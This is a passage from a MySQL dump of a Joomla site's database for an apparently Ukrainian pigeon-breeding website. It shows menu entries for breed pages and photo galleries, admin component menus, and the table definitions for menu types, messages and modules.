",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',137,138,0,'*',0),(823,'mainmenu','Оголошення','oholoshennia','','oholoshennia','index.php?option=com_content&view=category&layout=blog&id=130','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',58,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',113,114,0,'*',0),(824,'mainmenu','Фото ','foto','','foto','index.php?option=com_content&view=category&layout=blog&id=131','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',58,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',115,124,0,'*',0),(825,'mainmenu','Фотогалерея','fotohalereia','','foto/fotohalereia','index.php?option=com_content&view=category&layout=blog&id=131','component',1,824,2,22,0,'0000-00-00 00:00:00',0,1,' ',58,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',116,123,0,'*',0),(826,'mainmenu','Відео','video','','video','index.php?option=com_content&view=category&layout=blog&id=134','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',125,126,0,'*',0),(838,'mainmenu','Інформація голубівникам','informatsiia-holubivnykam','','holuby/informatsiia-holubivnykam','index.php?option=com_content&view=category&layout=blog&id=135','component',1,818,2,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',110,111,0,'*',0),(863,'mainmenu','Малинщина','malynshchyna','','foto/fotohalereia/malynshchyna','index.php?option=com_phocagallery&view=category&id=1','component',1,825,3,10425,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_pagination_categories\":\"0\",\"show_pagination_category\":\"1\",\"show_pagination_limit_categories\":\"0\",\"show_pagination_limit_category\":\"1\",\"show_ordering_categories\":\"0\",\"show_ordering_images\":\"1\",\"display_menu_link_title\":\"1\",\"display_cat_name_title\":\"1\",\"display_cat_name_breadcrumbs\":\"0\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',117,118,0,'*',0),(864,'mainmenu','Поштові голуби','poshtovi-holuby','','foto/fotohalereia/poshtovi-holuby','index.php?option=com_phocagallery&view=category&id=3','component',1,825,3,10425,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_pagination_categories\":\"0\",\"show_pagination_category\":\"1\",\"show_pagination_limit_categories\":\"0\",\"show_pagination_limit_category\":\"1\",\"show_ordering_categories\":\"0\",\"show_ordering_images\":\"1\",\"display_menu_link_title\":\"1\",\"display_cat_name_title\":\"1\",\"display_cat_name_breadcrumbs\":\"0\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',119,120,0,'*',0),(865,'mainmenu','Поштові білі','poshtovi-bili','','foto/fotohalereia/poshtovi-bili','index.php?option=com_phocagallery&view=category&id=4','component',1,825,3,10425,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_pagination_categories\":\"0\",\"show_pagination_category\":\"1\",\"show_pagination_limit_categories\":\"0\",\"show_pagination_limit_category\":\"1\",\"show_ordering_categories\":\"0\",\"show_ordering_images\":\"1\",\"display_menu_link_title\":\"1\",\"display_cat_name_title\":\"1\",\"display_cat_name_breadcrumbs\":\"0\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',121,122,0,'*',0),(879,'main','COM_JCE','com-jce','','com-jce','index.php?option=com_jce&view=cpanel','component',1,1,1,10133,0,'0000-00-00 00:00:00',0,1,'components/com_jce/media/img/menu/logo.png',0,'{}',127,136,0,'',1),(880,'main','COM_JCE_MENU_CPANEL','com-jce-menu-cpanel','','com-jce/com-jce-menu-cpanel','index.php?option=com_jce','component',1,879,2,10133,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',128,129,0,'',1),(881,'main','COM_JCE_MENU_CONFIG','com-jce-menu-config','','com-jce/com-jce-menu-config','index.php?option=com_jce&view=config','component',1,879,2,10133,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',130,131,0,'',1),(882,'main','COM_JCE_MENU_PROFILES','com-jce-menu-profiles','','com-jce/com-jce-menu-profiles','index.php?option=com_jce&view=profiles','component',1,879,2,10133,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',132,133,0,'',1),(883,'main','COM_JCE_MENU_FILEBROWSER','com-jce-menu-filebrowser','','com-jce/com-jce-menu-filebrowser','index.php?option=com_jce&view=browser','component',1,879,2,10133,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',134,135,0,'',1),(888,'mainmenu','Померанські дутиші','pomeranski-dutyshi','','holuby/pomeranski-dutyshi','index.php?option=com_content&view=category&layout=blog&id=136','component',1,818,2,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',106,107,0,'*',0),(902,'main','COM_GSD','com-gsd','','com-gsd','index.php?option=com_gsd','component',1,1,1,10386,0,'0000-00-00 00:00:00',0,1,'class:gsd',0,'{}',139,146,0,'',1),(903,'main','GSD_DASHBOARD','gsd-dashboard','','com-gsd/gsd-dashboard','index.php?option=com_gsd','component',1,902,2,10386,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',140,141,0,'',1),(904,'main','GSD_ITEMS','gsd-items','','com-gsd/gsd-items','index.php?option=com_gsd&view=items','component',1,902,2,10386,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',142,143,0,'',1),(905,'main','GSD_CONFIG','gsd-config','','com-gsd/gsd-config','index.php?option=com_gsd&view=config','component',1,902,2,10386,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',144,145,0,'',1),(906,'main','COM_PHOCAGALLERY','com-phocagallery','','com-phocagallery','index.php?option=com_phocagallery','component',1,1,1,10425,0,'0000-00-00 00:00:00',0,1,'class:cp',0,'{}',147,172,0,'',1),(907,'main','COM_PHOCAGALLERY_CONTROLPANEL','com-phocagallery-controlpanel','','com-phocagallery/com-phocagallery-controlpanel','index.php?option=com_phocagallery','component',1,906,2,10425,0,'0000-00-00 00:00:00',0,1,'class:cp',0,'{}',148,149,0,'',1),(908,'main','COM_PHOCAGALLERY_IMAGES','com-phocagallery-images','','com-phocagallery/com-phocagallery-images','index.php?option=com_phocagallery&view=phocagalleryimgs','component',1,906,2,10425,0,'0000-00-00 00:00:00',0,1,'class:images',0,'{}',150,151,0,'',1),(909,'main','COM_PHOCAGALLERY_CATEGORIES','com-phocagallery-categories','','com-phocagallery/com-phocagallery-categories','index.php?option=com_phocagallery&view=phocagallerycs','component',1,906,2,10425,0,'0000-00-00 00:00:00',0,1,'class:categories',0,'{}',152,153,0,'',1),(910,'main','COM_PHOCAGALLERY_THEMES','com-phocagallery-themes','','com-phocagallery/com-phocagallery-themes','index.php?option=com_phocagallery&view=phocagalleryt','component',1,906,2,10425,0,'0000-00-00 00:00:00',0,1,'class:themes',0,'{}',154,155,0,'',1),(911,'main','COM_PHOCAGALLERY_CATEGORYRATING','com-phocagallery-categoryrating','','com-phocagallery/com-phocagallery-categoryrating','index.php?option=com_phocagallery&view=phocagalleryra','component',1,906,2,10425,0,'0000-00-00 00:00:00',0,1,'class:rate-categories',0,'{}',156,157,0,'',1),(912,'main','COM_PHOCAGALLERY_IMAGERATING','com-phocagallery-imagerating','','com-phocagallery/com-phocagallery-imagerating','index.php?option=com_phocagallery&view=phocagalleryraimg','component',1,906,2,10425,0,'0000-00-00 00:00:00',0,1,'class:rate-images',0,'{}',158,159,0,'',1),(913,'main','COM_PHOCAGALLERY_CATEGORYCOMMENTS','com-phocagallery-categorycomments','','com-phocagallery/com-phocagallery-categorycomments','index.php?option=com_phocagallery&view=phocagallerycos','component',1,906,2,10425,0,'0000-00-00 00:00:00',0,1,'class:comment-categories',0,'{}',160,161,0,'',1),(914,'main','COM_PHOCAGALLERY_IMAGECOMMENTS','com-phocagallery-imagecomments','','com-phocagallery/com-phocagallery-imagecomments','index.php?option=com_phocagallery&view=phocagallerycoimgs','component',1,906,2,10425,0,'0000-00-00 00:00:00',0,1,'class:comment-images',0,'{}',162,163,0,'',1),(915,'main','COM_PHOCAGALLERY_USERS','com-phocagallery-users','','com-phocagallery/com-phocagallery-users','index.php?option=com_phocagallery&view=phocagalleryusers','component',1,906,2,10425,0,'0000-00-00 00:00:00',0,1,'class:users',0,'{}',164,165,0,'',1),(916,'main','COM_PHOCAGALLERY_TAGS','com-phocagallery-tags','','com-phocagallery/com-phocagallery-tags','index.php?option=com_phocagallery&view=phocagallerytags','component',1,906,2,10425,0,'0000-00-00 00:00:00',0,1,'class:tags',0,'{}',166,167,0,'',1),(917,'main','COM_PHOCAGALLERY_STYLES','com-phocagallery-styles','','com-phocagallery/com-phocagallery-styles','index.php?option=com_phocagallery&view=phocagalleryefs','component',1,906,2,10425,0,'0000-00-00 00:00:00',0,1,'class:styles',0,'{}',168,169,0,'',1),(918,'main','COM_PHOCAGALLERY_INFO','com-phocagallery-info','','com-phocagallery/com-phocagallery-info','index.php?option=com_phocagallery&view=phocagalleryin','component',1,906,2,10425,0,'0000-00-00 00:00:00',0,1,'class:info',0,'{}',170,171,0,'',1),(919,'main','com_weblinks','com-weblinks','','com-weblinks','index.php?option=com_weblinks','component',1,1,1,21,0,'0000-00-00 00:00:00',0,1,'class:weblinks',0,'{}',173,178,0,'',1),(920,'main','com_weblinks_links','com-weblinks-links','','com-weblinks/com-weblinks-links','index.php?option=com_weblinks','component',1,919,2,21,0,'0000-00-00 00:00:00',0,1,'class:weblinks',0,'{}',174,175,0,'',1),(921,'main','com_weblinks_categories','com-weblinks-categories','','com-weblinks/com-weblinks-categories','index.php?option=com_categories&extension=com_weblinks','component',1,919,2,21,0,'0000-00-00 00:00:00',0,1,'class:weblinks-cat',0,'{}',176,177,0,'',1),(922,'mainmenu','Адана турецька','adana-turetska','','holuby/adana-turetska','index.php?option=com_content&view=category&layout=blog&id=137','component',1,818,2,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"article_layout\":\"_:default\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',108,109,0,'*',0);
/*!40000 ALTER TABLE `fw3gt_menu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_menu_types`
--

DROP TABLE IF EXISTS `fw3gt_menu_types`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_menu_types` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `asset_id` int(10) unsigned NOT NULL DEFAULT '0',
  `menutype` varchar(24) COLLATE utf8mb4_unicode_ci NOT NULL,
  `title` varchar(48) COLLATE utf8mb4_unicode_ci NOT NULL,
  `description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `client_id` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_menutype` (`menutype`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_menu_types`
--

LOCK TABLES `fw3gt_menu_types` WRITE;
/*!40000 ALTER TABLE `fw3gt_menu_types` DISABLE KEYS */;
INSERT INTO `fw3gt_menu_types` VALUES (1,0,'mainmenu','Main Menu','The main menu for the site',0),(2,0,'top','Інформаційне меню1','',0),(3,0,'top2','Верхнє меню','',0);
/*!40000 ALTER TABLE `fw3gt_menu_types` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_messages`
--

DROP TABLE IF EXISTS `fw3gt_messages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_messages` (
  `message_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id_from` int(10) unsigned NOT NULL DEFAULT '0',
  `user_id_to` int(10) unsigned NOT NULL DEFAULT '0',
  `folder_id` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `date_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `state` tinyint(1) NOT NULL DEFAULT '0',
  `priority` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `subject` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `message` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`message_id`),
  KEY `useridto_state` (`user_id_to`,`state`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_messages`
--

LOCK TABLES `fw3gt_messages` WRITE;
/*!40000 ALTER TABLE `fw3gt_messages` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_messages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_messages_cfg`
--

DROP TABLE IF EXISTS `fw3gt_messages_cfg`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_messages_cfg` (
  `user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `cfg_name` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `cfg_value` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  UNIQUE KEY `idx_user_var_name` (`user_id`,`cfg_name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_messages_cfg`
--

LOCK TABLES `fw3gt_messages_cfg` WRITE;
/*!40000 ALTER TABLE `fw3gt_messages_cfg` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_messages_cfg` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_modules`
--

DROP TABLE IF EXISTS `fw3gt_modules`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_modules` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `asset_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.',
  `title` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `content` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `ordering` int(11) NOT NULL DEFAULT '0',
  `position` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `module` varchar(50) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `showtitle` tinyint(3) unsigned NOT NULL DEFAULT '1',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `client_id` tinyint(4) NOT NULL DEFAULT '0',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  KEY `published` (`published`,`access`),
  KEY `newsfeeds` (`module`,`published`),
  KEY `idx_language` (`language`)
) ENGINE=InnoDB AUTO_INCREMENT=186 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_modules`
--

LOCK TABLES `fw3gt_modules` WRITE;
/*!40000 ALTER TABLE `fw3gt_modules` DISABLE KEYS */;
